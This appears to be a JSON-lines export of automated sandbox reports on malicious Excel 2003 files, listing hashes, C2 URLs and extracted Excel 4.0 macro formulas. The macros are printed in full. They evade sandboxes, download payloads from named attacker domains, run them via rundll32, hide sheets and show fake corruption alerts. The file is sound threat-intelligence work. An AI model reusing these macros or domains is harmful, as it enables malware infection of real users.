{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9ec962b090ae3cc26ca8629cd5970693ff66cf6ba8d3ebeb27760e0c038700d"},"analysis":{"reported":"2020-04-09T16:18:33Z","score":10},"files":[{"filename":"b9ec962b090ae3cc26ca8629cd5970693ff66cf6ba8d3ebeb27760e0c038700d","filesize":168960,"md5":"61df20e2cce5a65c425b85e7b0297c27","sha1":"e40ecc828a3c3f56748e6cdab8bdc365d5086bcc","sha256":"b9ec962b090ae3cc26ca8629cd5970693ff66cf6ba8d3ebeb27760e0c038700d","sha512":"82d872257f7ec65ae3c689aa514bf2838b7cba000b29984fbcaa1b62faa0522f1a2291aa4dd4c5ce8ffd14faf9b9a482f9d750495a0e6ef4a4b1c7bb3b864310","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9ec962b090ae3cc26ca8629cd5970693ff66cf6ba8d3ebeb27760e0c038700d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZDC7av0tT2\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9f34a81be7c0918bd6daf6a65d4e924bdbdf06718d2c477935187bcd2b0c570"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"b9f34a81be7c0918bd6daf6a65d4e924bdbdf06718d2c477935187bcd2b0c570","filesize":112128,"md5":"52426d35b7b41bc3d9e7bc2c18ff9405","sha1":"5d63ffa7ed08912a291065e268165e1e7772691c","sha256":"b9f34a81be7c0918bd6daf6a65d4e924bdbdf06718d2c477935187bcd2b0c570","sha512":"e70a99bd0113c3c3779bf5839c99af191b9b2e58512cb35dde66885a59806caab0590744ef905a565249e3a2ec66be507c76e60da1d213412d9eb2991dc53c4d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9f34a81be7c0918bd6daf6a65d4e924bdbdf06718d2c477935187bcd2b0c570.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tozcftdl.xyz/SDVjkhb7831r"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nRETURN()\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b9fa0d57aceec426a92c74ed2703cd412336533ed7498b1ae135a8fd8f6e6483"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"b9fa0d57aceec426a92c74ed2703cd412336533ed7498b1ae135a8fd8f6e6483","filesize":142848,"md5":"45a266285aab5dae20361b62ca9c52f4","sha1":"dac26c1a6d75fcbcaf587344c0758a5f52ce42f8","sha256":"b9fa0d57aceec426a92c74ed2703cd412336533ed7498b1ae135a8fd8f6e6483","sha512":"0c8f3ec02260278eb4781ad1b4582a91efd97cd807e404ed102e95f32f15cc0d71cdbbeaeb710d995b6e41749cb5b15ea918576fa48317f711340fc5dad3db25","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b9fa0d57aceec426a92c74ed2703cd412336533ed7498b1ae135a8fd8f6e6483.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/fsgbfgbfsg43"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"uUkx4rwGfA\",TRUE)\nRETURN()\nRETURN()\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$20C$11\u003c770,CLOSE(FALSE),)\nIF(R$21C$11\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba00337a2d17f92a07361a8b43cab98e8fbf7c40209106422072208b56368bb0"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba00337a2d17f92a07361a8b43cab98e8fbf7c40209106422072208b56368bb0","filesize":170496,"md5":"04f4ae0a564caf83406fd874b70dccd0","sha1":"1cc96f92ac970ae9787d69989c5db5f943499ca1","sha256":"ba00337a2d17f92a07361a8b43cab98e8fbf7c40209106422072208b56368bb0","sha512":"9dba7b229f085eed5c8b01bbfb3d39e17c0732ae0ff58aec2991788f32dc42420f671d7b508bcba7ee18d2947528254d960161785880fe73dbb7249bfe251e0b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba00337a2d17f92a07361a8b43cab98e8fbf7c40209106422072208b56368bb0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XVVUfA1dJe\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba015296d0d4680948242285273b6b4d81d3f20e13afa2cb8509611b64b3ff93"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba015296d0d4680948242285273b6b4d81d3f20e13afa2cb8509611b64b3ff93","filesize":185344,"md5":"e23096cb0ea975ee1b9f129efadcade1","sha1":"adaf928a91ba5233689bb4ed78cf7f519173434a","sha256":"ba015296d0d4680948242285273b6b4d81d3f20e13afa2cb8509611b64b3ff93","sha512":"fb8e54c6da089696c56ce0f0d1323e13ee6bd8b9675696b39f6ab1ab86f63934c197db281fe57943a169e8a251a078d057dc1ac51b8665f9b188b4effe2a30e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba015296d0d4680948242285273b6b4d81d3f20e13afa2cb8509611b64b3ff93.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba134a147c1be91a426531c3636c38e85e9af9d942b558dfb77d9255eba15d59"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba134a147c1be91a426531c3636c38e85e9af9d942b558dfb77d9255eba15d59","filesize":112128,"md5":"b1dc49c916213f630c626f642d086b30","sha1":"266e13ea86ffa4b89f1712797230662734f453da","sha256":"ba134a147c1be91a426531c3636c38e85e9af9d942b558dfb77d9255eba15d59","sha512":"50bc07eecca28984da9793d00374f6abf3b510abffe3059231fd0d4e6790473aa0d5734d8ea07d7db585333736ac109d11b636335e3de4aaa65ab198a29fdebb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba134a147c1be91a426531c3636c38e85e9af9d942b558dfb77d9255eba15d59.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba1465c4e8dd4046c3a13c6c39d44a7a5ad624aeed50e5392c771680f4500b10"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba1465c4e8dd4046c3a13c6c39d44a7a5ad624aeed50e5392c771680f4500b10","filesize":167936,"md5":"3edcc98582101911836e4d721b5787b0","sha1":"b213a0098f900f61aa55f485bcee2f11705f1d67","sha256":"ba1465c4e8dd4046c3a13c6c39d44a7a5ad624aeed50e5392c771680f4500b10","sha512":"bb82ad5ac676bbc16f44dcb2b597e795193da76c6d3b347b86dd18cadfc3ddba245b119e8c0d06ff2381cc7b70cc85e31cc401c59b2217ecc6f6b6d56bd2f5e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba1465c4e8dd4046c3a13c6c39d44a7a5ad624aeed50e5392c771680f4500b10.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cUlx0XJGyi\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba1a1ccc62b8a15487cde91ca263cfbcce8f09db1d02c3a59eaf868ff7680c39"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba1a1ccc62b8a15487cde91ca263cfbcce8f09db1d02c3a59eaf868ff7680c39","filesize":168448,"md5":"4adf050e94e2b6331cd78221864eb61b","sha1":"8a0e2e8471471780967a15120c52556108a1a455","sha256":"ba1a1ccc62b8a15487cde91ca263cfbcce8f09db1d02c3a59eaf868ff7680c39","sha512":"1eeca7f0aa773439e6cdf3730ad8fe79f7142a1918a016a5d5de865761f30a4694584c2b7b1efdb6af81f560c9d6e4c715c107432c5cead664e140ea643302b9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba1a1ccc62b8a15487cde91ca263cfbcce8f09db1d02c3a59eaf868ff7680c39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6Tq19us2M7\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba1d527bd099f7deb265d0c7ae230ef86fc6a9dfa8464fcc0ffb800a5777e0ba"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba1d527bd099f7deb265d0c7ae230ef86fc6a9dfa8464fcc0ffb800a5777e0ba","filesize":168448,"md5":"f83a321d954d325696d0dd9a11660d7b","sha1":"ae59f2896e49c143416123c66479102d8b2887f9","sha256":"ba1d527bd099f7deb265d0c7ae230ef86fc6a9dfa8464fcc0ffb800a5777e0ba","sha512":"b2fd012b79277e67a0a1c380a35d1e4422eaaaaa9e0a003b14f8c1eab535c2470f58c7cd587a1baae161a2d734bc21d7ecf792329c5b2ee958a77a40a610a5dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba1d527bd099f7deb265d0c7ae230ef86fc6a9dfa8464fcc0ffb800a5777e0ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"u1y0b1WSxo\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba4267f84b7868d4c05982920702cb489c7324020ef403cabf8bc0d74d7aa509"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba4267f84b7868d4c05982920702cb489c7324020ef403cabf8bc0d74d7aa509","filesize":185344,"md5":"f84c84abaee764991f17f821923ef10e","sha1":"0af57fa1889316d4e25b2e4a149330273e6ae4c1","sha256":"ba4267f84b7868d4c05982920702cb489c7324020ef403cabf8bc0d74d7aa509","sha512":"502a2910f16c2765efd9cf38bbeea3d8413e09e851648f011c139e312da74a35c5bef7f2cfe35b62a0b8cab86bea2c094c1bdd3e1ae05bd95db5cdfa0d1c7151","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba4267f84b7868d4c05982920702cb489c7324020ef403cabf8bc0d74d7aa509.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba450b9e97473daf0478399ccd357af83cb1e0212a18c404c99c980f35eaa1d6"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba450b9e97473daf0478399ccd357af83cb1e0212a18c404c99c980f35eaa1d6","filesize":214528,"md5":"c4d64829560b61920708e3ad21312e90","sha1":"62b0c2f3a1e50ef99acb6ff9ff69a83d27eb340a","sha256":"ba450b9e97473daf0478399ccd357af83cb1e0212a18c404c99c980f35eaa1d6","sha512":"fe2a2f5c0bbdbcb09ebf4b206cf8338acc1ecb502f063439fd1ae6ac5b4b49fe2616b3a784293e9f67f52e8b48355a64ff8320364cbada06e2cb093504c4e4c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba450b9e97473daf0478399ccd357af83cb1e0212a18c404c99c980f35eaa1d6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WW6x5jsxXA\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba5062ec46e547ae917ce4ad127248c31baca3f7438eadfd0f9a5a16a60ff0f2"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba5062ec46e547ae917ce4ad127248c31baca3f7438eadfd0f9a5a16a60ff0f2","filesize":104448,"md5":"85c41d28d57ad42f0784e0104231003f","sha1":"6a6e3e67c9ac9419d85007b476d13d07ca6548b5","sha256":"ba5062ec46e547ae917ce4ad127248c31baca3f7438eadfd0f9a5a16a60ff0f2","sha512":"93e09bf92a83fc329e2d492b130c75aa7697886a3e10cd4c1906db35dad3e9f53b4972c7defe1fbffdfc248fef59e6c706f9dded3c3129948f67d9382c4c93c1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba5062ec46e547ae917ce4ad127248c31baca3f7438eadfd0f9a5a16a60ff0f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"zrOjPcLqhH\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba51bf2ee3b980d006b406a8cc1e926e672f72653e916ea9045554a3f36bb7e9"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba51bf2ee3b980d006b406a8cc1e926e672f72653e916ea9045554a3f36bb7e9","filesize":185344,"md5":"56fa6aa078f76c5b2b422d0725557d4a","sha1":"2f9beb64f039785502a16178752770c10eb4298a","sha256":"ba51bf2ee3b980d006b406a8cc1e926e672f72653e916ea9045554a3f36bb7e9","sha512":"4cec6a117e60dda0dedb9116d9e94de8df92fbd335bddee2f5f553cc7e8af77e737c6c746386a2c716a9a1af5bc2705aa7df195d620018801bd16112bee2a59f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba51bf2ee3b980d006b406a8cc1e926e672f72653e916ea9045554a3f36bb7e9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/DVkjbsdv37"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba53a2264525dfe40a1a8807479729a790a422192d7c5ac86422d4b170b331d5"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba53a2264525dfe40a1a8807479729a790a422192d7c5ac86422d4b170b331d5","filesize":141824,"md5":"bd39affb0f79bce5d48985c9d76a3d01","sha1":"a8ff4ec4b0d737953ec7357d721659ba8d11f8db","sha256":"ba53a2264525dfe40a1a8807479729a790a422192d7c5ac86422d4b170b331d5","sha512":"23a3ef8db3e00a84bcb1b73e7f99e374acc5f2d19d6b630b8b4527ab32891a497fa105c6e9eac4508e44071ea231d4271585967bf5536dd4244b45d92a4ba18d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba53a2264525dfe40a1a8807479729a790a422192d7c5ac86422d4b170b331d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"8SZbV6PDVm\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba64f32d4b27d7f0974bcabc86d830b4f78920bdcfdac15b9e4b8511d3f514cb"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba64f32d4b27d7f0974bcabc86d830b4f78920bdcfdac15b9e4b8511d3f514cb","filesize":152576,"md5":"42aae02d8a809a068888fb88b1ffcb02","sha1":"aec238197b1e71e777729709964de1c67b73fa63","sha256":"ba64f32d4b27d7f0974bcabc86d830b4f78920bdcfdac15b9e4b8511d3f514cb","sha512":"76397eca44ea9b0e89d1cc84e5ca39d56dac5dc3ecfe4f07ce3f69ae9bdd4d180724140153c721792c33a50c9a79e22a21457d37a0acd92c0c6fa9d9447588ac","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba64f32d4b27d7f0974bcabc86d830b4f78920bdcfdac15b9e4b8511d3f514cb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cNLdT8KQut\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"ba78b29dd832b5f20d5571ebb590bdd7379a21abf46c4e4cee1a97c42f140509"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"ba78b29dd832b5f20d5571ebb590bdd7379a21abf46c4e4cee1a97c42f140509","filesize":167424,"md5":"e63968dd223cc7a0d8070456d765bd5b","sha1":"4be485c706a794b54e749d10b263d8c11aebc96c","sha256":"ba78b29dd832b5f20d5571ebb590bdd7379a21abf46c4e4cee1a97c42f140509","sha512":"430d00c2a208f0b785c0d855f2031d9760830867031bc56f3d40ce352bc29db1ee57e3b235295f95cb8090c025e57de02afd753ea89fc99e8adce6862eb3ba52","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"ba78b29dd832b5f20d5571ebb590bdd7379a21abf46c4e4cee1a97c42f140509.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"NMLRdWdfaq\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"baa5235fe023c531ddf041be7062af2d33a359d58b5796cc6b0453a75357ee23"},"analysis":{"reported":"2020-04-09T16:18:34Z","score":10},"files":[{"filename":"baa5235fe023c531ddf041be7062af2d33a359d58b5796cc6b0453a75357ee23","filesize":140800,"md5":"e04dbd6e6411e9a53d76d64314008805","sha1":"f2e83030f5a9628fc6e50714cfd1022dc701a2c5","sha256":"baa5235fe023c531ddf041be7062af2d33a359d58b5796cc6b0453a75357ee23","sha512":"b6c1c862561de75a9b9796f9b6dc98c7f3df0c42ec3a798315f69cd7769853e2612f53277c28b027383e7f9f55ade5841e0ec55f41ee941a626c72a8e832a148","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"baa5235fe023c531ddf041be7062af2d33a359d58b5796cc6b0453a75357ee23.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"0C170liNCg\",TRUE)\nRETURN()\nRETURN()"}}}]}
